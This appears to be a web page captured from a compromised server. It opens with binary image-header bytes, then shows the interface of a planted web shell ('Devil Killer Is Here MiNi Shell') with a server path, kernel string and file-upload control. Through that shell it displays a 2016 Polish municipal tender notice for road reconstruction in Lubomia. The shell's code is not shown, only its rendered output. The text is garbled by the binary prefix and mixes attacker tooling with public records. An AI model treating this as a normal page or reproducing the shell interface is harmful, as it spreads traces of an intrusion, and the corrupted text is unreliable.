JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160830/303528-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 303528 - 2016
              z dnia 2016-08-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Lubomia: Przebudowa dróg gminnych:
Część I:
1.Przebudowa dwóch bocznych odcinków ul. Głównej w Bukowie
2.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 70 do pos. Nr 66
3.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 28 do ul. Kościelnej
4.Przebudowa drogi gminnej ul. boczna Dąbrowy w Syryni na odcinku od posesji 18 do  posesji nr 17
Część II
1.Przebudowa ulicy Nepomucena w Lubomi.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Lubomia, krajowy numer identyfikacyjny
              53737800000, ul.
              ul. Szkolna 
              1,
              44360  
              Lubomia, woj.
              śląskie, państwo
              , tel.
              032 4516614/ 4516128, e-mail
              , faks
              324 516 614.
              <br />
              Adres strony internetowej (URL): www.lubomia.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.lubomia.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.lubomia.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w formie pisemnej w trwle zamknitej koperce lub opakowaiu , za pśrednictwem operatora pocztowego, osobiście lub z pośrednictwe posłańca <br />
                Adres:
                <br />Urząd Gminy Lubomia 44-360 Lubomia ul. Szkolna 1 Sekretarat </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa dróg gminnych:
Część I:
1.Przebudowa dwóch bocznych odcinków ul. Głównej w Bukowie
2.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 70 do pos. Nr 66
3.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 28 do ul. Kościelnej
4.Przebudowa drogi gminnej ul. boczna Dąbrowy w Syryni na odcinku od posesji 18 do  posesji nr 17
Część II
1.Przebudowa ulicy Nepomucena w Lubomi.
<br /><b>Numer referencyjny: </b>RI.271.4.2016.RS<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Remont dróg gminnych:
Część I
1.Przebudowa dwóch bocznych odcinków ul. Głównej w Bukowie
a) boczna ul. Głównej w Bukowie odcinek od ul. Głównej  do farmy drobiu nr działki 148 dł.130,0 m szer.3,5m
konstrukcja nawierzchni; 
-w-wa ścieralna z betonu asfaltowego AC11S 50/70 gr. 4 cm
-w-wa wiążąca z betonu asfaltowego gr. AC16 50/70 4 cm
-podbudowa zasadnicza z kruszywa łamanego gr. w-wy 20 cm
-w-wa odsączająca z piasku gr. 10 cm
Odwodnienie powierzchniowe na przyległe tereny
b) boczna ul. Głównej w Bukowie odcinek od ul. Głównej  do granicy pos. nr 16 działki nr 
874/140, 675/133, 1146/139,  1145/139, 674/133  dł.50,0 m szer.3,0m
-w-wa ścieralna z betonu asfaltowego AC11S 50/70 gr. 5 cm
-w-wa wiążąca z betonu asfaltowego gr. AC16 50/70 7 cm
-podbudowa zasadnicza z kruszywa łamanego gr. w-wy 20 cm
-w-wa odsączająca z piasku gr. 23 cm
Jezdnia obramowana krawężnikiem 15*30 na ławie betonowej z oporem, na wjazdach krawężnik najazdowy.
2.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 70 do pos. Nr 66
Przedmiotem zadania jest przebudowa ul. 3-do Maja bocznej na odcinku od posesji nr 70 (skrzyżowanie z ul. 3-go Maja; początek opracowania) do posesji nr 66. Ulica 3-go Maja boczna jest droga dojazdową (kl. D) i drogą gminną o kategorii ruchu KR 1.
Długość remontowanego odcinka drogi wynosi 116,40 m. Szerokość jezdni będzie wynosiła 3,0-3,5 m. Nawierzchnia jezdni zostanie ograniczona krawężnikami: wtopionymi o wymiarach 12x25 cm posadowionymi na ławie betonowej, krawężnikami wystającymi o wymiarach 15x30 cm oraz najazdowymi (15x22 cm) posadowionymi na ławie betonowej z oporem. Ławy wykonane zostaną z betonu kl. C12/15. Zaprojektowano jednostronny spadek jezdni    o wartości 2,0% w kierunku działek o numerach 1677/114, 2178/114 i 795/110. Od strony działek 2178/114 i 1677/114 ułożone zostaną krawężniki zwykłe i najazdowe. Na pozostałym odcinku zaprojektowano krawężniki wtopione.
Zaprojektowano następujące warstwy konstrukcyjne na jezdni: 
- Warstwa ścieralna z betonu asfaltowego AC11S gr. 4,0 cm 
-Warstwa wiążąca z betonu asfaltowego AC16W gr. 4,0 cm 
-Podbudowa tłuczniowa w  wa górna fr. 0/31,5 mm gr. 8,0 cm 
-Podbudowa tłuczniowa w  wa dolna fr. 31,5/63 mm gr. 15 cm 
-Warstwa odsączająca - podsypka piaskowa gr. 15,0 cm
Łączna grubość warstw konstrukcyjnych wynosiła będzie 46,0 cm.
Odwodnienie
Wody opadowe i roztopowe zostaną odprowadzone poprzez zaprojektowane spadki poprzeczne i podłużne na pobocze tłuczniowe, a następnie na istniejące pobocze trawiaste (działka gminna 795/110).
3.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 28 do ul. Kościelnej
Przedmiotem zadania jest przebudowa ul. 3-do Maja bocznej na odcinku od posesji nr 28 (skrzyżowanie z ul. 3-go Maja; początek opracowania) do skrzyżowania z ul. Kościelną. Ulica 3-go Maja boczna jest droga dojazdową (kl. D) i drogą gminną o kategorii ruchu KR 1.
Długość remontowanego odcinka drogi wynosi 141,20 m. Szerokość jezdni będzie wynosiła 3,50 m.
Nawierzchnia jezdni zostanie ograniczona krawężnikami wtopionymi o wymiarach 12x25 cm, wystającymi o wymiarach 15x30 cm i najazdowymi o wymiarach 15x22 cm (wg rysunku Projekt zagospodarowania terenu). Krawężniki zostaną posadowione na ławach betonowych z betonu kl. C12/15. Zaprojektowano jednostronny spadek jezdni o wartości 2,0%              w kierunku remontowanego parkingu oraz stawu. Spadek parkingu (również  o wartości 2,0%) skierowany będzie w stronę jezdni, zaś na połączeniu jezdni i parkingu zaprojektowano korytko odpływowe betonowe posadowione na ławie betonowej (kl. C12/15).
Zaprojektowano następujące warstwy konstrukcyjne na jezdni:
-Warstwa ścieralna z betonu asfaltowego AC11S gr. 4,0 cm 
-Warstwa wiążąca z betonu asfaltowego AC16W gr. 4,0 cm 
-Podbudowa tłuczniowa w  wa górna fr. 0/31,5 mm gr. 8,0 cm
-Podbudowa tłuczniowa w  wa dolna fr. 31,5/63 mm gr. 15 cm 
-Warstwa odsączająca - podsypka piaskowa gr. 15,0 cm
Łączna grubość warstw konstrukcyjnych wynosiła będzie 46,0 cm.
Odwodnienie
Wody opadowe i roztopowe zostaną odprowadzone poprzez zaprojektowane spadki poprzeczne i podłużne na pobocze tłuczniowe, a następnie na istniejące pobocze trawiaste (w sąsiedztwie stawu) oraz do projektowanej kratki ściekowej zlokalizowanej                       w sąsiedztwie istniejącej studni rewizyjnej. Na odcinku od skrzyżowania z drogą powiatową do projektowanej kratki ściekowej ułożone zostanie korytko odpływowe z elementów betonowych. Projektowana kratka ściekowa z wpustem jezdniowym kl. D400 wykonana będzie z kręgów betonowych o średnicy 500 mm i połączona zostanie  z istniejącą studnią rewizyjną przykanalikiem z rur PVC-U kl. S 160 mm.
4. Przebudowa drogi gminnej ul. boczna Dąbrowy w Syryni na odcinku od posesji 18 do  posesji nr 17
Przedmiotem zadania jest przebudowa ul. bocznej Dąbrowy na odcinku od pos.nr 18 do pos. Nr 17. Długość odcinka wynosi 118,5m szer.3,0mNawierzchnia jezdni zostanie ograniczona krawężnikami wtopionymi 12x25 cm oraz wystającymi 15x30 na długości skarpy.
Zaprojektowano następujące warstwy konstrukcyjne na jezdni:
-Warstwa ścieralna z betonu asfaltowego AC11S gr. 4,0 cm 
-Warstwa wiążąca z betonu asfaltowego AC16W gr. 4,0 cm 
-Podbudowa tłuczniowa w  wa górna fr. 0/31,5 mm gr. 8,0 cm
-Podbudowa tłuczniowa w  wa dolna fr. 31,5/63 mm gr. 15 cm 
-Warstwa odsączająca - podsypka piaskowa gr. 15,0 cm
Łączna grubość warstw konstrukcyjnych wynosiła będzie 46,0 cm.
Wody opadowe i roztopowe zostaną odprowadzone poprzez zaprojektowane spadki poprzeczne i podłużne na pobocze.
Część II
1.Przebudowa ulicy Nepomucena w Lubomi
Celem opracowania jest zaprojektowanie remontu ul. Nepomucena w zakresie obejmującym przebudowę chodnika wraz z kanalizacją deszczową.
Zakres kanalizacji do wykonania w ramach ogłoszonego postępowania obejmuje wykonanie kanalizacji deszczowej na odcinku (zgodnie z załączonym rysunkiem zakresu kanalizacji) od D-19 km 0+820 do D-31 km 1+280. Studzienki ściekowe  tylko po stronie prawej, wyprowadzenie  zaślepionego przykanalika  dla kratek po lewej stronie na długości chodnika. Na pozostałym odcinku chodnika wykonać nowe studnie rewizyjne na istniejącej kanalizacji oraz wyregulować istniejące kratki.
Projektuje się wykonanie chodników na odcinkach jak niżej:
od istniejącej skrzyżowania z ul. Asnyka do KM 1+277 s. prawa KM 0+735  0+755 s. lewa - peron przystankowy szerokości 2,00m od skrzyżowania z ul. Parkową do KM 1+277 s. lewa
Konstrukcja projektowanych chodników jak niżej:
kostka brukowa betonowa szara gr. 6cm podsypka cementowo  piaskowa gr. 5cm podbudowa z kruszywa łamanego gr. 15cm
Wjazdy indywidualne do posesji w ciągu projektowanych chodników posiadać będą nawierzchnię z kostki brukowej betonowej kolor, połączenie wjazdów z krawędzią jezdni wykonane za pomocą skosów 1:1.
Wjazdy indywidualne do posesji w ciągu projektowanego pobocza będą posiadać będą nawierzchnię z betonu asfaltowego jak również nawierzchnię z kostki brukowej betonowej, <br /><br /><b>II.5) Główny kod CPV: </b>45233220-7<br /><b> Dodatkowe kody CPV:</b>45233260-9,
                45231300-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 30% wartości zamówienia podstawowego. Zakres zamówień uzupełniających obejmuje roboty o charakterze zamówienia podstawowego. Przewiduje się zwiększenie ilości krawężnika betonowego, kanalizacji deszczowej, nawierzchni bitumicznej oraz nawierzchni chodnika i wjazdów z kostki betonowej brukowej.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia w tym zakresie żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                -dysponowanie środkami finansowymi lub posiadanie zdolności kredytowej na poziomie nie niższym niż kwota 
dla części I 100 000,00 zł,
dla części II 300 000,00 zł,
-posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości nie niższej niż:  
dla części I 100 000,00 zł,
dla części II 300 000,00 zł,
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                o zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o zamówienie publiczne, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia:
Część I - budowa, przebudowa drogi na dł. min.100 m o wartości min. 100 000,00 zł.
Część II - budowa, przebudowa chodnika, drogi na dł. min.300 m wraz z odwodnieniem o wartości min. 300 000,00 zł. Jako referencje (inne dokumenty) dotyczące realizacji Jako referencje (inne dokumenty) dotyczące realizacji           z ostatnich 5 lat przed dniem wszczęcia postępowania, Zamawiający uzna takie, które dotyczą realizacji zadań, których zakończenie miało miejsce nie wcześniej jak 5 lat przed dniem wszczęcia postępowania a które zostały zakończone przed upływem terminu składania ofert i odebrane protokołem odbioru końcowego.
 -  o zamówienie mogą ubiegać się wykonawcy posiadający do dyspozycji przy wykonywaniu zamówienia odpowiednio wykwalifikowanych osób na stanowisku kierownika budowy/robót posiadającego uprawnienia w branży: drogowej do kierowania robotami budowlanymi bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane w zakresie budowy dróg, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz aktualne zaświadczenie o wpisie na listę właściwej izby samorządu zawodowego zatrudniona na podstawie umowy o pracę- 1 osoba - do pełnienia funkcji kierownika budowy/robót.
z ostatnich 5 lat przed dniem wszczęcia postępowania, <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę w zakresie realizacji zamówienia na podstawie umowy o pracę kierownika budowy, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz. U. z 2014 r. poz. 1502, z późn. zm.).</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">a) wypełniony formularz oferty załącznik nr 1
b)oświadczenie wykonawcy składane na podstawie art. 25a ust. 1 ustawy dotyczące przesłanek wykluczenia z postępowania - załącznik nr 2
c) oświadczenie wykonawcy składane na podstawie art. 25a ust. 1 ustawy dotyczące spełniania warunków udziału w postępowaniu  załącznik nr 3 
d) wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie  według wzoru stanowiącego   załącznik nr 4
e) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją                 o podstawie do dysponowania tymi osobami wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień załącznik nr 5
f ) lista podmiotów należących do tej samej grupy kapitałowej załącznik nr 6
g) informację o braku przynależności do grupy kapitałowej załącznik nr 7
h) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 UPZP,        a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 UPZP; (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców odpowiedni dokument musi być złożony przez każdego z nich).
